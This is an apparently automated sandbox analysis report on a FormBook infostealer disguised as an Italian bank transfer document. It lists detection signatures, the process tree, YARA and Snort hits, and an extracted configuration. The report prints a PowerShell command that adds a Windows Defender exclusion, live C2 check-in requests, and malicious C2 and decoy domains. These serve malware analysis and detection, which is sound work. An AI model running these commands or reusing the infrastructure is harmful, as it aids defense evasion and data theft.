Windows Analysis Report
Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe

Overview

General Information

Sample name: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
Analysis ID: 1460774
MD5: 6b799c2e76b37bf96ef35ba8580f0bfc
SHA1: b710a5aa6385f9424c37c944ef27d10ef99df97f
SHA256: e10280c91dc1fb46756d9473163eec9052b8c8a352955d0f21a24246da054ba2
Tags: exe, formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe" MD5: 6B799C2E76B37BF96EF35BA8580F0BFC)
    • powershell.exe (PID: 7792 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe (PID: 7828 cmdline: "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe" MD5: 6B799C2E76B37BF96EF35BA8580F0BFC)
      • explorer.exe (PID: 2592 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • control.exe (PID: 7984 cmdline: "C:\Windows\SysWOW64\control.exe" MD5: EBC29AA32C57A54018089CFC9CACAFE8)
          • cmd.exe (PID: 8024 cmdline: /c del "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Source | Rule | Description | Author | Strings
00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      Source | Rule | Description | Author | Strings
      6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
      6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group

          System Summary

          Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe", ParentImage: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, ParentProcessId: 7532, ParentProcessName: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe", ProcessId: 7792, ProcessName: powershell.exe
          Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe", ParentImage: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, ParentProcessId: 7532, ParentProcessName: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe", ProcessId: 7792, ProcessName: powershell.exe
          Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
          06/21/24-16:14:50.292769 | 2031412 | 49716 | 80 | TCP | A Network Trojan was detected
          06/21/24-16:17:32.715564 | 2031412 | 64867 | 80 | TCP | A Network Trojan was detected
          06/21/24-16:16:30.997720 | 2031412 | 64864 | 80 | TCP | A Network Trojan was detected
          06/21/24-16:17:12.110813 | 2031412 | 64866 | 80 | TCP | A Network Trojan was detected
          06/21/24-16:18:16.654776 | 2031412 | 64868 | 80 | TCP | A Network Trojan was detected
          06/21/24-16:15:50.125620 | 2031412 | 64862 | 80 | TCP | A Network Trojan was detected
          06/21/24-16:16:51.501355 | 2031412 | 64865 | 80 | TCP | A Network Trojan was detected
          06/21/24-16:16:10.912575 | 2031412 | 64863 | 80 | TCP | A Network Trojan was detected
          06/21/24-16:15:29.832153 | 2031412 | 64861 | 80 | TCP | A Network Trojan was detected

          AV Detection

          Source: http://www.motchillssss.top, Avira URL Cloud: Label: malware
          Source: http://www.motchillssss.top/pz12/, Avira URL Cloud: Label: malware
          Source: http://www.motchillssss.top/pz12/?Ft6LPF=bG4RJrnXbim/D3cBlUwrMYqb2ZS77l+Go/8AkclYnXcXK2JRZ8TcvaCLEE/32UP8PfnZ&Ev2=OjrLPv0Hh4WLu, Avira URL Cloud: Label: malware
          Source: http://www.loyalbahis356.com/pz12/?Ft6LPF=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9IBcU0d9A8jH&Ev2=OjrLPv0Hh4WLu, Avira URL Cloud: Label: malware
          Source: http://www.ebehemin.com/pz12/, Avira URL Cloud: Label: malware
          Source: https://login.microsoftonline.co, Avira URL Cloud: Label: phishing
          Source: http://www.loyalbahis356.com, Avira URL Cloud: Label: malware
          Source: http://www.ebehemin.com, Avira URL Cloud: Label: malware
          Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.jnhdh8827.com/pz12/"], "decoy": ["paucanyes.com", "autonwheels.com", "cowboysandcaviarbar.com", "fitnessengineeredworkouts.com", "nuevobajonfavorito.com", "dflx8.com", "rothability.com", "sxybet88.com", "onesource.live", "brenjitu1904.com", "airdrop-zero1labs.com", "guangdongqiangzhetc.com", "apartments-for-rent-72254.bond", "ombak99.lol", "qqfoodsolutions.com", "kyyzz.com", "thepicklematch.com", "ainth.com", "missorris.com", "gabbygomez.com", "aromacuppa.com", "kaskusbagus.com", "zoox1.asia", "hemophilia-treatment-41433.bond", "meidupro.com", "shrisona.com", "sekanse.com", "marcocostasax.com", "loyalbahis356.com", "mzmz97.com", "ma-google.com", "xiangadvanced.site", "tuotalogis.com", "xcxocef.shop", "fidgetbottles.com", "shuaninvolved.site", "ambientelatino.com", "98980901.com", "singhbrothersframes.com", "pureamyl.com", "hgs0713.net", "surejobzapp.com", "slotgame99.bet", "datalakeflow.com", "ebehemin.com", "vanessasmobilespa.com", "317wb.com", "motchillssss.top", "huesch.net", "salesgymshark.shop", "mejorcompra99.com", "tacubashop.com", "jessicaxsimmons.com", "roar-stores.com", "chalkandthimble.com", "84556.vip", "luyutuwen.com", "siliconcollege.icu", "marvowhite.com", "gjxuh82y0u3h6.top", "e2taop5.top", "businessbroadway.com", "cripmz.xyz", "4hu259.com"]}
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, ReversingLabs: Detection: 78%
          Source: Yara match, File source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Joe Sandbox ML: detected
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: control.pdb source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1423184745.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421108416.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, control.exe, control.exe, 00000008.00000002.3765131140.0000000000220000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.1421198308.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.1423117793.000000000459B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000008.00000003.1421198308.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.1423117793.000000000459B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1423184745.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421108416.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.3765131140.0000000000220000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: BIze.pdbSHA256 source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Binary string: BIze.pdb source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 4x nop then jmp 073B7288h, 0_2_073B69D3
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 4x nop then pop ebx, 6_2_00407B1B
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Code function: 4x nop then pop edi, 6_2_00416CEB
          Source: C:\Windows\SysWOW64\control.exe, Code function: 4x nop then pop ebx, 8_2_02537B1B
          Source: C:\Windows\SysWOW64\control.exe, Code function: 4x nop then pop edi, 8_2_02546CEB

          Networking

          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:49716 -> 188.114.96.3:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:64861 -> 188.114.97.3:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:64862 -> 3.64.163.50:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:64863 -> 172.67.158.16:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:64864 -> 185.53.179.92:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:64865 -> 103.169.142.0:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:64866 -> 192.64.118.107:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:64867 -> 188.114.96.3:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:64868 -> 107.158.172.173:80
          Source: Malware configuration extractor, URLs: www.jnhdh8827.com/pz12/
          Source: global traffic, HTTP traffic detected: GET /pz12/?Ft6LPF=tXrQrgXPfQCqrAqcdoT/KCxiftMWx+uc6jO1VE/0fl1BeE1n2goaTZbQHU/iA/QpxM3q&Ev2=OjrLPv0Hh4WLu HTTP/1.1 Host: www.jnhdh8827.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /pz12/?Ft6LPF=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9IBcU0d9A8jH&Ev2=OjrLPv0Hh4WLu HTTP/1.1 Host: www.loyalbahis356.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /pz12/?Ft6LPF=oomdQ+KKoNdRQ1HBV3YuY4HYSwe0GXxiurC4ZPs5qTfDQPHef20Z2PpAaiNPivFMepGH&Ev2=OjrLPv0Hh4WLu HTTP/1.1 Host: www.sxybet88.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /pz12/?Ft6LPF=wKkXOPvX+avhNB0WpobAo/RdD5Vgm0uLsJUbUuPKtyZfimvU+K3iz8PSEmeh48r72CNx&Ev2=OjrLPv0Hh4WLu HTTP/1.1 Host: www.ainth.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /pz12/?Ft6LPF=bG4RJrnXbim/D3cBlUwrMYqb2ZS77l+Go/8AkclYnXcXK2JRZ8TcvaCLEE/32UP8PfnZ&Ev2=OjrLPv0Hh4WLu HTTP/1.1 Host: www.motchillssss.top Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /pz12/?Ft6LPF=I28W/3a7leZLTJTVQ6pLzOFASFQBM/RHJVT607x5WCzJ2jZGT2NOi6Mb2MIHH5pYEuLB&Ev2=OjrLPv0Hh4WLu HTTP/1.1 Host: www.hemophilia-treatment-41433.bond Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /pz12/?Ft6LPF=wmB39g7fMVvhAuIXrcacNlSYByOKhXrL5caurGICgekgrDmbedkAGJpMCJINZ+FV4qAD&Ev2=OjrLPv0Hh4WLu HTTP/1.1 Host: www.paucanyes.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /pz12/?Ft6LPF=oHprbzlDionZVyQ1tKhLJIMMM9VbSt1+94xivpjLAu060YRgv/mETNkmThmCujjhO3iW&Ev2=OjrLPv0Hh4WLu HTTP/1.1 Host: www.ombak99.lol Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /pz12/?Ft6LPF=QmILE5Yj5FPxS0L9f6nor9rKO5Y2+RnVUWg4I1d5MMTzUgBssQh0GRAykt5Xu8CyVf+z&Ev2=OjrLPv0Hh4WLu HTTP/1.1 Host: www.shuaninvolved.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View, IP Address: 188.114.97.3
          Source: Joe Sandbox View, IP Address: 185.53.179.92
          Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
          Source: Joe Sandbox View, ASN Name: TEAMINTERNET-ASDE
          Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exe, Code function: 7_2_0C611F82 getaddrinfo,setsockopt,recv,7_2_0C611F82
          Source: global traffic, DNS traffic detected: DNS query: www.jnhdh8827.com
          Source: global traffic, DNS traffic detected: DNS query: www.loyalbahis356.com
          Source: global traffic, DNS traffic detected: DNS query: www.sxybet88.com
          Source: global traffic, DNS traffic detected: DNS query: www.ainth.com
          Source: global traffic, DNS traffic detected: DNS query: www.motchillssss.top
          Source: global traffic, DNS traffic detected: DNS query: www.hemophilia-treatment-41433.bond
          Source: global traffic, DNS traffic detected: DNS query: www.paucanyes.com
          Source: global traffic, DNS traffic detected: DNS query: www.ombak99.lol
          Source: global traffic, DNS traffic detected: DNS query: www.shuaninvolved.site
          Source: global traffic, DNS traffic detected: DNS query: www.meidupro.com
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 21 Jun 2024 14:17:33 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tLQJlLW8SkiYBMHFnts7gjykOqYs3BXybBPpNHRFAkouMnNPt1KPTATlxh6ESQYSk3GYuqdaepawogs7EV8f%2F3l%2BmF8Z3w1gryXSxlCXOgKcVQrt4NZ6A%2BGoGhFbJkrjkIlHLDCdoW9N"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89749f6dddaf4375-EWR alt-svc: h3=":443"; ma=86400 Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.shuaninvolved.site Port 80</address></body></html>
          Source: explorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3775303278.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://passwordreset.micros
          Source: explorer.exe, 00000007.00000002.3775303278.000000000B9B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1379438012.000000000B9B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comeer0
          Source: explorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3775303278.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://tip.passwordreset.microso
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3775303278.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
          Source: explorer.exe, 00000007.00000003.3081656079.00000000087ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3770457753.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2192144452.00000000087EE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/medical/mayo-clinic-minute-who-benefits-from-taking-statins/ar-AA1h
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/home-and-garden/10-vital-home-maintenance-tasks-you-ll-regret-if
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/vote-to-oust-mccarthy-is-a-warning-sign-for-democracy-schola
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/counterpoint-individual-parents-rights-do-not-translate-to-a-licen
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controv
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
